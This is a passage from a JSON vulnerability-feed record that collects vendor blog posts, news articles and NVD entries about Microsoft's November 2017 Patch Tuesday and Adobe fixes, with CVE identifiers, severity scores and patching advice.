Reproducibility or Exploitation Unlikely \nCVE-2017-8700 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**Zero-Day Filters**\n\nThere are 6 new zero-day filters covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Adobe (6)_**\n\n| \n\n * 29934: ZDI-CAN-5140: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29935: ZDI-CAN-5141: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29936: ZDI-CAN-5142: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29937: ZDI-CAN-5143: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29938: ZDI-CAN-5144: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29939: ZDI-CAN-5145: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-november-6-2017/>).", "modified": "2017-11-17T16:46:19", "published": "2017-11-17T16:46:19", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-november-13-2017/", "id": "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of November 13, 2017", "cvss": 
{"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11847", "CVE-2017-11848", "CVE-2017-11871", "CVE-2017-11873", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-13080", "CVE-2017-8700"], "description": "This November Patch Tuesday is moderate in volume and severity. Microsoft released patches to address 53 unique vulnerabilities, with 25 focused on Remote Code Execution fixes. Windows OS receives 14 patches, while the lion's share is focused on Browsers, Microsoft Office, and Adobe. According to Microsoft, there do not appear to be any actively attacked vulnerabilities in the wild in this patch release.\n\nInterestingly enough, none of the Windows OS patches are listed as Critical this month, but we do recommend focusing on [CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>) and [CVE-2017-11847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11847>), as they address a Security Feature Bypass, and a Privilege Elevation respectively. 
\n\nIt should also be noted that [CVE-2017-11848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848>), [CVE-2017-11827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827>), [CVE-2017-11883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883>), [CVE-2017-8700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700>) have public exploits, but they do not appear to be used in any active campaigns.\n\nFrom a prioritization standpoint, focus on the fixes for [CVE-2017-11836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836>), [CVE-2017-11837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837>), [CVE-2017-11838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838>), [CVE-2017-11839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839>), [CVE-2017-11871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871>), and [CVE-2017-11873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873>), which all address the Scripting Engine in Edge and Internet Explorer, especially on laptops, and other workstation-type systems where the logged in user may have administrative privileges. 
Microsoft lists exploitation as More Likely for these vulnerabilities, especially if a user is tricked into viewing a malicious site or opening an attachment.\n\nWhile Microsoft lists the fix for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) as Important, there may be POC code for this vulnerability, so it is recommended that you give the Office updates attention this month as well.\n\nIt should also be noted that [last Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2017/10/10/october-patch-tuesday-28-critical-microsoft-vulnerabilities>), Microsoft quietly released the fix for [CVE-2017-13080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-13080>), widely known as the KRACK vulnerability in WPA2 wireless protocol, but did not make it known until a week later, when the vulnerability was publicly disclosed. Therefore, it is recommended you ensure last month\u2019s security patches are fully addressed. 
Alternatively, you can install this month\u2019s Monthly Rollups, as they should include this fix.\n\nAdobe has also [released patches for 9 advisories](<https://helpx.adobe.com/security.html>), fixing a stunning 62 CVEs for Acrobat and Reader alone, so ensure that you are updating Adobe across your environment to stay protected.", "modified": "2017-11-14T19:37:26", "published": "2017-11-14T19:37:26", "id": "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2017/11/14/november-patch-tuesday-53-vulnerabilities-and-a-massive-adobe-update", "type": "qualysblog", "title": "November Patch Tuesday: 53 Vulnerabilities and a Massive Adobe Update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:27", "bulletinFamily": "info", "cvelist": ["CVE-2017-11839", "CVE-2017-13080", "CVE-2017-11882", "CVE-2017-11871", "CVE-2017-11848", "CVE-2017-8700", "CVE-2017-11836", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11877", "CVE-2017-11827", "CVE-2017-11847", "CVE-2017-11883"], "description": "It's Patch Tuesday\u2014time to update your Windows devices. \n \nMicrosoft has [released](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/bae9d0d8-e497-e711-80e5-000d3a32fc99>) a large batch of security updates as part of its November Patch Tuesday in order to fix a total of 53 new security vulnerabilities in various Windows products, 19 of which are rated as critical, 31 important and 3 moderate. \n \nThe vulnerabilities impact the Windows OS, Microsoft Office, Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, .NET Core, and more. 
\n \nAt least four of these vulnerabilities that the tech giant has now fixed have public exploits, allowing attackers to exploit them easily. But fortunately, none of the four are being used in the wild, according to Gill Langston at security firm [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2017/11/14/november-patch-tuesday-53-vulnerabilities-and-a-massive-adobe-update>). \n \nThe four vulnerabilities with public exploits are identified by Microsoft as CVE-2017-8700 (an information disclosure flaw in ASP.NET Core), CVE-2017-11827 (Microsoft browsers remote code execution), CVE-2017-11848 (Internet Explorer information disclosure) and CVE-2017-11883 (denial of service affecting ASP.NET Core). \n \n\n\n### Potentially Exploitable Security Vulnerabilities\n\n \nWhat's interesting about this month's Patch Tuesday is that none of the Windows OS patches are rated as Critical. However, Device Guard Security Feature Bypass Vulnerability (CVE-2017-11830) and Privilege Elevation flaw (CVE-2017-11847) are something you should focus on. \n \nAlso, according to an [analysis](<https://www.zerodayinitiative.com/blog/2017/11/14/the-november-2017-security-update-review>) of Patch Tuesday fixes by Zero-Day Initiative, [CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>) and another flaw identified as [CVE-2017-11877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11877>) can be exploited to spread malware. \n\n\n> \"CVE-2017-11830 patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticate files,\" Zero-Day Initiative said. 
\n \n\"CVE-2017-11877 fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers.\"\n\nThe tech giant also fixed six remote code execution vulnerabilities that exist \"in the way the scripting engine handles objects in memory in Microsoft browsers.\" \n \nMicrosoft identified these vulnerabilities as CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11871, and CVE-2017-11873, which could corrupt memory in such a way that attackers could execute malicious code in the context of the current user. \n\n\n> \"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website,\" Microsoft said. \"These websites could contain specially crafted content that could exploit the vulnerability.\" \n\n### 17-Year-Old MS Office Flaw Lets Hackers Install Malware\n\n \nAlso, you should be extra careful when opening files in MS Office. \n \nAll versions of Microsoft Office released in the past 17 years were found vulnerable to a [remote code execution flaw](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) (CVE-2017-11882) that works against all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update. \n \nHowever, due to improper memory operations, the component fails to properly handle objects in memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user. \n \nExploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software, which could allow attackers to remotely install malware on targeted computers. 
\n \n\n\n### Adobe Patch Tuesday: Patches 62 Vulnerabilities\n\n \nBesides fixing vulnerabilities in its various products, Microsoft has also released updates for Adobe Flash Player. \n \nThese updates correspond with [Adobe Update APSB17-33](<https://helpx.adobe.com/security/products/flash-player/apsb17-33.html>), which patches 62 CVEs for Acrobat and Reader alone. So, Flash Player users are advised to ensure that they update Adobe across their environment to stay protected. \n \nIt should also be noted that last Patch Tuesday, Microsoft quietly released the patch for the dangerous **[KRACK vulnerability](<https://thehackernews.com/2017/10/wpa2-krack-wifi-hacking.html>)** (CVE-2017-13080) in the WPA2 wireless protocol. \n \nTherefore, users are also advised to make sure that they have patched their systems with last month's security patches. \n \nAlternatively, users are strongly advised to apply November security patches as soon as possible in order to keep hackers and cybercriminals away from taking control of their computers. 
\n \nFor installing security updates, just head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "modified": "2017-11-15T10:15:50", "published": "2017-11-14T20:46:00", "id": "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "href": "https://thehackernews.com/2017/11/microsoft-patch-tuesday.html", "type": "thn", "title": "Patch Tuesday: Microsoft Releases Update to Fix 53 Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-11770", "CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11848", "CVE-2017-11871", "CVE-2017-11873", "CVE-2017-11877", "CVE-2017-11879", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-8700"], "description": "Microsoft tackled 53 vulnerabilities with today\u2019s Patch Tuesday bulletin. Remote code execution bugs dominated this month\u2019s patches, representing 25 fixes. In total, 20 of Microsoft\u2019s security fixes were rated critical.\n\nNotable are four vulnerabilities with public exploits identified by Microsoft as [CVE-2017-11848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848>), [CVE-2017-11827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827>), [CVE-2017-11883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883>) and [CVE-2017-8700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700>). 
But, according to an analysis of Patch Tuesday fixes by Qualys, none of the four are being [used in active campaigns](<https://blog.qualys.com/laws-of-vulnerabilities/2017/11/14/november-patch-tuesday-53-vulnerabilities-and-a-massive-adobe-update>).\n\nSecurity experts say companies should prioritize patching a half-dozen scripting engine memory corruption vulnerabilities impacting Microsoft\u2019s Edge and Internet Explorer 11 browsers running on versions of Windows 10, Windows 8.1, Windows 7 and Windows Server (version 1709).\n\n\u201cA remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user,\u201d wrote Microsoft regarding [CVE-2017-11836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836>), [CVE-2017-11837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837>), [CVE-2017-11838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838>), [CVE-2017-11839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839>), [CVE-2017-11871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871>), and [CVE-2017-11873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873>).\n\nMicrosoft said if exploited, an attacker could gain the same user rights as the current user. \u201cIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website,\u201d Microsoft wrote. 
\u201cThese websites could contain specially crafted content that could exploit the vulnerability.\u201d\n\nResearchers at Zero Day Initiative said that of the critical vulnerabilities it spotted, a distinct malware [bypass theme emerged](<https://www.thezdi.com/blog/2017/11/14/the-november-2017-security-update-review>). It wrote, \u201c[CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>) patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticate files\u2026 [CVE-2017-11877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11877>) fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers.\u201d\n\n\u201cSpeaking of malware, this patch fixes a CVE ([CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>)) that allows Device Guard to incorrectly validate an untrusted file. This means attackers could make an unsigned file appear to be signed. Since Device Guard relies on a valid signature to determine trustworthiness, malicious files could be executed by making untrusted files seem trusted. This is exactly the sort of bug malware authors seek, as it allows them to have their exploit appear as a trusted file to the target,\u201d ZDI wrote.\n\nPart of Patch Tuesday also included an advisory ([ADV170020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170020>)), which is related to Microsoft Office Defense in Depth Update series. 
\u201cADV170020 is likely related to the malware abusing Dynamic Data Exchange, and this advisory may help restrict abusing this protocol feature,\u201d wrote Zero Day Initiative researchers.\n\nDespite a number of [attacks that have used Dynamic Data Exchange fields in Office](<https://threatpost.com/microsoft-provides-guidance-on-mitigating-dde-attacks/128833/>), Microsoft has remained insistent that DDE is a product feature and not a vulnerability.\n\nPart of Patch Tuesday also includes something new, according to Greg Wiseman, Rapid7\u2019s senior security researcher, who said Microsoft is applying fixes to some of its open source projects. \u201cSixteen of the Edge vulnerabilities have been resolved in ChakraCore, the open source part of Edge\u2019s JavaScript engine,\u201d Wiseman said. \u201c.NET Core is being patched for a denial of service (DoS) vulnerability ([CVE-2017-11770](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11770>)), and ASP.NET Core has fixes for DoS ([CVE-2017-11883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883>)), privilege escalation ([CVE-2017-11879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11879>)), and information disclosure ([CVE-2017-8700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700>)) vulnerabilities this month.\u201d\n\nLastly, Qualys warns ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), a Microsoft Office memory corruption vulnerability rated as important, should be prioritized. 
\u201cThere may be POC code for this vulnerability, so it is recommended that you give the Office updates attention this month as well,\u201d Qualys wrote.\n", "modified": "2017-11-14T17:10:48", "published": "2017-11-14T17:10:48", "id": "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "href": "https://threatpost.com/microsoft-patches-20-critical-vulnerabilities/128891/", "type": "threatpost", "title": "Microsoft November Patch Tuesday Fixes 20 Critical Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Microsoft Edge in Windows 10 1709 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11862", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11862"], "modified": "2017-11-30T13:21:00", "cpe": ["cpe:/a:microsoft:chakracore:-", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11862", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Microsoft Windows 10 1703, 1709 and Windows Server, version 1709 allows an attacker to obtain information to further compromise the user's system, due to how Microsoft Edge handles objects in memory, aka \"Microsoft Edge Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11803 and CVE-2017-11833.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11844", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11844"], "modified": "2017-12-01T15:26:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11844", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Microsoft Windows 10 1703, 1709, Windows Server, version 1709, and ChakraCore allows an attacker to bypass Control Flow Guard (CFG) to run arbitrary code on a target system, due to how Microsoft Edge handles accessing memory in code compiled by the Edge Just-In-Time (JIT) compiler, aka \"Microsoft Edge Security Feature Bypass Vulnerability\". This CVE ID is unique from CVE-2017-11863 and CVE-2017-11872.", "edition": 5, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 3.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11874", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11874"], "modified": "2019-10-03T00:03:00", "cpe": 
["cpe:/a:microsoft:chakracore:-", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11874", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Windows 10 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11862, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11861", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-11861"], "modified": "2017-11-30T12:51:00", "cpe": ["cpe:/a:microsoft:chakracore:-", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11861", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "The Windows kernel component on Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016, and Windows Server, version 1709, allows an information disclosure vulnerability when it improperly handles objects in memory, aka \"Windows Kernel Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11842, CVE-2017-11849, and CVE-2017-11853.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11851", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11851"], "modified": 
"2017-12-01T18:29:00", "cpe": ["cpe:/o:microsoft:windows_server:1709", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-11851", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11851", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Microsoft Edge and Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka 
